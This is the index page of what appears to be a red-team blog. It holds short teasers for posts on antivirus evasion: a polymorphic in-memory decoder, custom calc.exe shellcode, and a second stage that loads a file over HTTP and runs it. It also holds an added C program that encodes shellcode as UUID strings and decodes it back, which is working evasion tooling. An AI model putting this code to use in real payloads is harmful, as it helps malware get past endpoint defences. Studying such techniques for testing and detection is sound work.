#nosoc blog

Approved 2024/09/01 22:45 by psycore (version: 5) | Approver: psycore


Expect the unexpected

Obfuscation: polymorphic in-memory decoder

Red-team engagements and penetration tests often require antivirus to be bypassed so that the actual security vulnerabilities can be reached and demonstrated. In the last part we looked at disguising shellcode as UUIDs in the source code. That worked well against on-disk scanning, but the decoded shellcode was detected in memory and blocked.

We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.

→ Read more...

Obfuscation: Disguise shellcode as UUIDs

In the last blog post we dealt with the development of a calc.exe shellcode. The injection method that I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and shellcode accordingly.

I came up with the idea of converting the opcodes into a string array filled with UUIDs. These have to be converted back into bytes before injection. To do this, I wrote an encoder and a decoder that do exactly that.

→ Read more...
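The encoder/decoder pair described in the teaser above, written out as an added example; this is not the post's own code. It assumes a plain sequential byte order inside each UUID (byte 0 is the first hex pair of the string), 0x90 (NOP) as the padding byte for the final partial block, and a constructed 20-byte sample that stands in for real shellcode. `swap_to_guid_layout` is included for the case where the loader decodes with the Windows `UuidFromStringA` API: that function fills a GUID struct whose first three fields are native-endian integers, so the encoder must byte-swap those groups or the first eight bytes of every block arrive scrambled.

```c
#include <stdio.h>
#include <string.h>

/* A UUID string is 8-4-4-4-12 hex digits plus four hyphens: 36 chars + NUL. */
#define UUID_STR_LEN 37
#define UUID_BYTES   16

/* Constructed sample input (NOT real shellcode): 20 arbitrary non-zero bytes,
 * chosen so that the second UUID needs padding. */
static const unsigned char sample_payload[] = {
    0x48, 0x31, 0xc9, 0x48, 0x81, 0xe9, 0xc6, 0xff, 0xff, 0xff,
    0x48, 0x8d, 0x05, 0xef, 0xff, 0xff, 0xff, 0x48, 0xbb, 0x11
};

/* Encode `len` bytes into UUID strings, 16 bytes per UUID, sequential order.
 * The last UUID is padded with `pad_byte` (0x90 = NOP is the assumption here,
 * so trailing filler is harmless if execution ever reaches it).
 * Returns the number of UUIDs written, or 0 if `out` cannot hold them all. */
size_t encode_uuids(const unsigned char *in, size_t len, unsigned char pad_byte,
                    char (*out)[UUID_STR_LEN], size_t max_uuids)
{
    size_t n = (len + UUID_BYTES - 1) / UUID_BYTES;
    if (n == 0 || n > max_uuids) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char b[UUID_BYTES];
        for (size_t j = 0; j < UUID_BYTES; j++) {
            size_t idx = i * UUID_BYTES + j;
            b[j] = idx < len ? in[idx] : pad_byte;
        }
        snprintf(out[i], UUID_STR_LEN,
                 "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x",
                 b[0], b[1], b[2], b[3], b[4], b[5], b[6], b[7],
                 b[8], b[9], b[10], b[11], b[12], b[13], b[14], b[15]);
    }
    return n;
}

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode one UUID string into 16 bytes (same sequential order as the encoder).
 * Returns 0 on success, -1 if the string is malformed (wrong length, hyphens in
 * the wrong places, non-hex character). A loader that skips this check will
 * happily inject garbage if a UUID was mistyped or truncated. */
int decode_uuid(const char *s, unsigned char out[UUID_BYTES])
{
    static const size_t hyphen_at[] = { 8, 13, 18, 23 };
    size_t o = 0;
    if (strlen(s) != 36) return -1;
    for (size_t k = 0; k < 4; k++)
        if (s[hyphen_at[k]] != '-') return -1;
    for (size_t i = 0; i < 36; ) {
        if (s[i] == '-') { i++; continue; }
        int hi = hexval(s[i]), lo = hexval(s[i + 1]);
        if (hi < 0 || lo < 0) return -1;
        out[o++] = (unsigned char)((hi << 4) | lo);
        i += 2;
    }
    return o == UUID_BYTES ? 0 : -1;
}

/* Decode `n` UUID strings into a contiguous buffer of n * 16 bytes.
 * Returns bytes written, or 0 on a malformed UUID or a too-small buffer. */
size_t decode_uuids(char (*uuids)[UUID_STR_LEN], size_t n,
                    unsigned char *out, size_t out_cap)
{
    if (out_cap < n * UUID_BYTES) return 0;
    for (size_t i = 0; i < n; i++)
        if (decode_uuid(uuids[i], out + i * UUID_BYTES) != 0) return 0;
    return n * UUID_BYTES;
}

/* Windows caveat: UuidFromStringA() fills a GUID whose Data1 (4 bytes), Data2
 * and Data3 (2 bytes each) are little-endian integers, so those groups end up
 * byte-reversed in memory relative to the string. Apply this to each 16-byte
 * block BEFORE encoding if the loader decodes that way; Data4 is untouched. */
void swap_to_guid_layout(unsigned char b[UUID_BYTES])
{
    unsigned char t;
    t = b[0]; b[0] = b[3]; b[3] = t;
    t = b[1]; b[1] = b[2]; b[2] = t;
    t = b[4]; b[4] = b[5]; b[5] = t;
    t = b[6]; b[6] = b[7]; b[7] = t;
}

/* Encode, decode, compare with the original. Returns 1 on success. */
int roundtrip_ok(const unsigned char *in, size_t len)
{
    char uuids[64][UUID_STR_LEN];
    unsigned char back[64 * UUID_BYTES];
    size_t n = encode_uuids(in, len, 0x90, uuids, 64);
    if (n == 0) return 0;
    if (decode_uuids(uuids, n, back, sizeof back) != n * UUID_BYTES) return 0;
    return memcmp(in, back, len) == 0;
}

int main(void)
{
    char uuids[8][UUID_STR_LEN];
    size_t n = encode_uuids(sample_payload, sizeof sample_payload, 0x90, uuids, 8);
    for (size_t i = 0; i < n; i++)
        printf("\"%s\",\n", uuids[i]);   /* paste-able as a C string array */
    printf("round trip %s\n",
           roundtrip_ok(sample_payload, sizeof sample_payload) ? "ok" : "FAILED");
    return 0;
}
```

Whichever byte order the encoder uses, the decoder in the loader has to use the same one; the round-trip check is the cheapest way to catch a mismatch before the first test injection silently runs the wrong bytes.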


Shellcode Injection Part 4

In this article, shellcode obfuscation is only touched on in passing. Instead, I wanted to develop a custom shellcode from scratch to learn more about how it works.

The following requirements should be met:

  • Launches calc.exe on a Windows host
  • 64-bit code
  • Contains no null bytes

→ Read more...

Shellcode Injection Part 3

Shellcode injections are generally used to start a reverse shell. In some circumstances, however, it is preferable to keep the injected stub small and fetch the actual shell code in a second stage.

In this blog post, I show how we can use a shellcode injection to load a file via HTTP and then execute it.

→ Read more...

en/index.txt · Last modified: 2024/09/01 22:45
CC Attribution-Noncommercial-Share Alike 4.0 International